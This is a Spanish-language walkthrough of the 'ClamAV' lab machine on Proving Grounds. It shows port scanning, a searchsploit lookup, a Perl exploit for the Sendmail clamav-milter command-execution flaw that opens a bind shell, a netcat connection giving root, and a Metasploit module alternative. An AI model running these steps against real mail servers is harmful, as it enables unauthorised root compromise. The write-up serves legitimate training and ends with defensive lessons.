Salta el contingut

ClamAV (Proving Grounds)

Datos del Objetivo Descripci贸n
Direcci贸n IP 192.168.142.42
Sistema Operativo Linux (Debian)
Nivel Intermedio / Simulaci贸n de Examen
Vectores de Ataque Enumeraci贸n de Servicios, RCE en Sendmail, ClamAV Milter.

1. Fase de Reconocimiento

Arrancamos la auditor铆a realizando un barrido completo de puertos TCP para mapear la superficie de ataque disponible.

sudo nmap 192.168.142.42 -Pn -p- -sS -sV

Resumen de Puertos Abiertos

Puerto Servicio Detectado Versi贸n
22 SSH OpenSSH 3.8.1p1
25 SMTP Sendmail 8.13.4
80 HTTP Apache 1.3.33
139/445 SMB Samba 3.X - 4.X
199 SMUX Linux SNMP multiplexer
60000 SSH OpenSSH (Puerto alternativo)

An谩lisis de la Superficie de Ataque

Inicialmente, los servicios web (puerto 80) y de archivos compartidos (SMB) no arrojaron vulnerabilidades explotables tras una inspecci贸n manual. Sin embargo, el nombre de host de la m谩quina ("ClamAV") nos dio la pista definitiva.

Este nombre sugiere que el servidor est谩 ejecutando el antivirus ClamAV, el cual a menudo se integra con servidores de correo (como el Sendmail detectado en el puerto 25) mediante un componente llamado "milter" (mail filter).

Consultamos la base de datos de exploits buscando coincidencias para esta combinaci贸n:

searchsploit sendmail clamav
# Hallazgo: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution

Confirmamos la existencia de una vulnerabilidad cr铆tica de Ejecuci贸n Remota de Comandos (RCE) en versiones antiguas de clamav-milter.


2. Explotaci贸n y Acceso (V铆a Manual)

El exploit seleccionado abusa de la falta de saneamiento en el filtro de correo para inyectar comandos. El script est谩 dise帽ado para levantar una bind shell en el puerto 31337.

Procedimiento de ataque:

  1. Lanzamiento del Payload: Ejecutamos el script en Perl apuntando a la direcci贸n IP de la v铆ctima.

    perl clamav.pl 192.168.142.42
    

    Detalle t茅cnico: El script manipula las cabeceras SMTP para forzar al servicio a ejecutar un comando que abre el puerto de escucha.

  2. Confirmaci贸n: Verificamos que el puerto 31337 ahora se encuentre en estado OPEN.

  3. Obtenci贸n de Shell (Privilegios Root): Nos conectamos al puerto reci茅n abierto utilizando Netcat. Debido a que el servicio de correo se ejecuta con altos privilegios, la sesi贸n resultante nos otorga control total del sistema inmediatamente.

    nc 192.168.142.42 31337
    
    id
    # uid=0(root) gid=0(root) groups=0(root)
    

Root Flag: ********************************


3. V铆a Alternativa: Metasploit Framework

Si preferimos una explotaci贸n automatizada, Metasploit cuenta con un m贸dulo espec铆fico para este fallo de seguridad.

msfconsole
use exploit/unix/smtp/clamav_milter_blackhole
set RHOSTS 192.168.142.42
run

Este m茅todo gestiona el env铆o del correo malicioso y establece la sesi贸n sin necesidad de scripts externos.


Conclusiones y Notas Finales

  • Enumeraci贸n Pasiva: Prestar atenci贸n a metadatos como el hostname puede revelar software instalado que no aparece directamente en un escaneo de puertos (como el plugin ClamAV detr谩s de Sendmail).
  • Gesti贸n de Parches: La presencia de software "Legacy" (antiguo), como esta versi贸n de Sendmail, suele garantizar una entrada f谩cil debido a CVEs conocidos y sin parchar.
  • Configuraci贸n de Servicios: Ejecutar servicios expuestos a internet (como un servidor de correo) con privilegios de root es una pr谩ctica peligrosa que facilita el compromiso total del sistema en un solo paso.